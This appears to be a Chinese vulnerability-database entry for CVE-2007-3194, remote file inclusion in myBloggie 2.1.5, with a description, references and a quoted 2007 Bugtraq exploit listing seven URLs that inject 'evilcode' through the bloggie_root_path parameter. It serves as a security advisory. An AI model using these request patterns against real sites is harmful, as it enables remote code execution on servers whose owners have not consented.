myBloggie PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1190242 漏洞类型 未知
发布时间 2007-06-12 更新时间 2007-06-13
CVE编号 CVE-2007-3194 CNNVD-ID CNNVD-200706-206
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2007060055
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200706-206
|漏洞详情
myBloggiePHP中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到(1)config.php;includes/中的(2)db.php;(3)template.php;(4)functions.php和(5)classes.php文件以及(6)viewmode.php和(7)blog_body.php的bloggie_root_path参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
 ########################################################################
#
 #                                                                       
 # myBloggie 2.1.5 RFI                                                      
 #                                                                       
 # Author:  Yaser <yaser (at) gencturk (dot) net [email concealed]>                                  
 #                                                                       
 # Homepage: http://www.ayyildiz.org
 #                                       
 ########################################################################
#

########################################################################
#
 # Download S : http://mywebland.com/download.php?id=19                
 #                                                                     
 # Exploits:                                                               
 #                                                                      
 # http://site/config.php?bloggie_root_path=evilcode?               
 # http://site/includes/db.php?bloggie_root_path=evilcode?
 # http://site/includes/template.php?bloggie_root_path=evilcode?
 # http://site/includes/functions.php?bloggie_root_path=evilcode?
 # http://site/includes/classes.php?bloggie_root_path=evilcode?                                                                    
 # http://site/viewmode.php.php?bloggie_root_path=evilcode?
 # http://site/blog_body.php?bloggie_root_path=evilcode?      
 #                                                                    
 ########################################################################
#

Thanks: H0tturk - ir4dex - ht08 - ajann - GencTurk - Zakix - Devil Hacker
                            
Referance: www.h0tturk.com and Stefan Esser
|参考资料

来源:BUGTRAQ
名称:20070609myBloggie2.1.5RemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/470972/100/0/threaded
来源:OSVDB
名称:37685
链接:http://osvdb.org/37685
来源:BUGTRAQ
名称:20070610Re:myBloggie2.1.5RemoteFileInclude
链接:http://archives.neohapsis.com/archives/bugtraq/2007-06/0125.html
来源:SREASON
名称:2794
链接:http://securityreason.com/securityalert/2794